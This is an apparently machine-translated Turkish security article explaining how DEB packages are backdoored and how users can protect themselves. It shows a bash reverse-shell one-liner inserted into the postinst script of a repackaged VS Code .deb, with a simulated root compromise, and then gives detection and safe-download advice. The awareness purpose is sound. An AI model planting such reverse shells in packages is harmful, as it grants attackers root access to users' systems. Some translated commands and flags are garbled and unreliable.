Saldırganların bilgisayarınıza yetkisiz erişim sağlamak için DEB dosyasında paketlenmiş komut dosyalarını değiştirebileceğini biliyor muydunuz? İşte DEB paketlerinin arka kapıya nasıl kapatıldığı.
Temel Çıkarımlar
- DEB paketlerine kolayca arka kapı açılabilir, bu da onları root izinleriyle yüklediğinizde saldırganların sisteminize kötü amaçlı kod eklemesine olanak tanır.
- Virüs bulaşmış DEB paketlerinin tespit edilmesi zordur çünkü bunlar antivirüs yazılımı veya VirusTotal gibi bulut çözümleri tarafından işaretlenmeyebilir.
- Kendinizi korumak için DEB paketlerini rastgele sitelerden indirmekten kaçının, resmi indirme sitelerine bağlı kalın veya topluluğun güvendiği siteler ve Linux sisteminizi ağa karşı korumak için güvenlik araçları yüklemeyi düşünün saldırılar.
DEB dosyaları, Debian tabanlı Linux dağıtımlarındaki yazılımın birincil formatı olan yazılım paketleridir.
DEB paketlerini kurmak için dpkg gibi root izinlerine sahip bir paket yöneticisi kullanmanız gerekir. Saldırganlar bundan yararlanarak bu paketlere arka kapılar enjekte ederler. Bunları dpkg veya başka bir paket yöneticisi ile yüklediğinizde, kötü amaçlı kod da birlikte yürütülür ve sisteminizin güvenliğini tehlikeye atar.
DEB paketlerinin nasıl arka kapıya kapatıldığını ve kendinizi korumak için neler yapabileceğinizi tam olarak keşfedelim.
DEB Paketleri Nasıl Arka Kapıya Açılır?
DEB paketlerinin nasıl arka kapıyla kapatıldığını anlamadan önce, bir DEB paketinin içinde neler olduğunu inceleyelim. Gösterim amacıyla Microsoft Visual Studio Code DEB paketini resmi Microsoft web sitesinden indireceğim. Bu, Linux'a VS Code'u yüklemek istiyorsanız indireceğiniz paketin aynısıdır.
İndirmek:Visual Studio Kodu
Artık hedef paketi indirdiğinize göre paketi açmanın zamanı geldi. Bir DEB paketini aşağıdaki komutu kullanarak açabilirsiniz: dpkg-deb ile komut -R flag ve ardından içeriğin saklanacağı yol:
dpkg-deb -R Bu, VS Code paketinin içeriğini çıkarmalıdır.
Klasöre girdiğinizde birden fazla dizin bulacaksınız, ancak bizim ilgimiz yalnızca DEBIAN dizin. Bu dizin, kurulum sırasında kök ayrıcalıklarıyla yürütülen bakımcı komut dosyalarını içerir. Zaten anlamış olabileceğiniz gibi, saldırganlar bu dizindeki komut dosyalarını değiştirir.
Gösteri için, değiştireceğim sonradan komut dosyası oluşturun ve basit bir tek satırlık Bash ters TCP kabuğu ekleyin. Adından da anlaşılacağı gibi, paket sisteme yüklendikten sonra çalıştırılan bir komut dosyasıdır.
Sembolik bağlantıların ayarlanması, bağımlılık yönetimi ve daha fazlası gibi yapılandırmaları sonlandıran komutlar içerir. İnternette tonlarca farklı ters kabuk bulabilirsiniz. Çoğu aynı şekilde çalışacak. İşte örnek ters kabuk tek astarlı:
bash -i >& /dev/tcp/127.0.0.1/42069 0>&1Komutun açıklaması:
- bash: Bu, Bash kabuğunu çağıran komuttur.
- -Ben: Bayrak, Bash'e gerçek zamanlı komut G/Ç'sine izin veren etkileşimli modda çalışmasını söyler.
-
>& /dev/tcp/ip/port: Bu yönlendirir standart çıktı ve standart hata bir ağ soketine, esasen bir TCP bağlantısı kurarak
Ve . - 0>&1: Bu, giriş ve çıkışı aynı konuma, yani ağ soketine yönlendirir.
Deneyimsiz olanlar için ters kabuk, hedef makinede çalıştırıldığında saldırganın makinesine geri bağlantı başlatan bir kod türüdür. Ters kabuklar, trafik güvenlik duvarının arkasındaki makineden oluşturulduğu için güvenlik duvarı kısıtlamalarını atlamanın harika bir yoludur.
Değiştirilen komut dosyası şu şekilde görünür:
Gördüğünüz gibi her şey aynı ancak yalnızca bir satır eklendi, yani Bash ters kabuğumuz. Şimdi dosyaları tekrar ".deb" biçim. Basitçe kullanın dpkg ile komut --inşa etmek işaretle veya kullan dpkg-deb ile -B flag ve ardından çıkarılan içeriğin yolu:
dpkg --build
dpkg-deb -b Artık arka kapılı DEB paketi kötü amaçlı sitelere gönderilmeye hazır. Bir kurbanın DEB paketini kendi sistemine indirdiği ve onu diğer normal paketler gibi kurduğu bir senaryoyu simüle edelim.
Üstteki terminal bölmesi kurbanın POV'si içindir ve alttaki ise saldırganın POV'sidir. Kurban paketi şununla yüklüyor: sudo dpkg -i ve saldırgan, gelen bağlantıları sabırla dinliyor. netcat Linux'ta komut.
Kurulum biter bitmez saldırganın ters kabuk bağlantısını aldığını ve artık kurbanın sistemine root erişimine sahip olduğunu fark edeceksiniz. Artık DEB paketlerinin nasıl arka kapıya kapatıldığını biliyorsunuz. Şimdi kendinizi nasıl koruyabileceğinizi öğrenelim.
Bir DEB Paketinin Kötü Amaçlı Olduğu Nasıl Tespit Edilir
Artık virüslü DEB paketlerinin bir sorun olduğunu bildiğinize göre, virüslü olanları nasıl bulacağınızı merak ediyor olmalısınız. Yeni başlayanlar için, bir kullanmayı deneyebilirsiniz. Linux antivirüs yazılımı ClamAV gibi. Ne yazık ki paket üzerinde bir ClamAV taraması çalıştırıldığında, paket onu kötü amaçlı olarak işaretlemedi. İşte taramanın sonucu:
Dolayısıyla, birinci sınıf bir antivirüs çözümünüz olmadığı sürece (bu, saldırıya uğramayacağınızın garantisi değildir), kötü amaçlı DEB paketlerini tespit etmek oldukça zordur. VirusTotal web sitesi gibi bir bulut çözümü kullanmayı deneyelim:
Gördüğünüz gibi VirusTotal bunda yanlış bir şey tespit etmedi. Kendinizi bu tür tehditlere karşı korumanın tek yolu, her zaman bilinmeyen kaynaklardan dosya indirmemek gibi temel güvenlik kurallarına uymaktır. bir dosyanın karma değerini kontrol etmeve genel olarak şüpheli yazılım yüklemekten kaçınmak.
İnternet bu tür tehditlerle dolu. Verilerinizi kaybetmeden sörf yapmanın tek yolu, aklınıza sahip olmak ve güvenilir sitelere göz atmaktır. Ek olarak, Linux için, indirdiğiniz yazılımın bir özelliği olup olmadığını da bulmayı denemelisiniz. AppImage çeşidi bağımsız olduklarından ve korumalı alana alınabildiklerinden sisteminizle temastan uzak tutulabilirler.
DEB Paketlerini Rastgele Sitelerden İndirmeyin!
DEB paketleri doğası gereği kötü değildir, ancak saldırganlar bunları kolayca silahlandırabilir ve şüphelenmeyen kullanıcılara gönderebilir. Gösterildiği gibi, bir DEB paketi yalnızca birkaç komutla kolayca açılabilir ve özel kod eklenecek şekilde değiştirilebilir, bu da onu kötü amaçlı yazılımların gönderilmesi için yaygın bir vektör haline getirir.
DEB paketlerindeki basit arka kapılar bile en iyi antivirüs çözümleri tarafından yakalanamıyor. Dolayısıyla yapılacak en iyi şey güvenli oynamak, web'de gezinirken sağduyunuzu taşımak ve yazılımı her zaman yalnızca resmi indirme sitelerinden veya topluluğun güvendiği sitelerden indirmektir.
Artık DEB paketlerini yeni veya bilinmeyen sitelerden yüklemenin getirdiği güvenlik risklerinin farkında olduğunuza göre, yeni yazılım yüklerken dikkatli olmalısınız. Ancak ne yüklediğinize dikkat etmek yeterli değildir. Linux sisteminiz de ağ saldırılarının hedefi olabilir.
Bir ağ saldırısı durumunda güvende olduğunuzdan emin olmak için ağ güvenlik araçlarını yüklemeyi düşünmelisiniz.
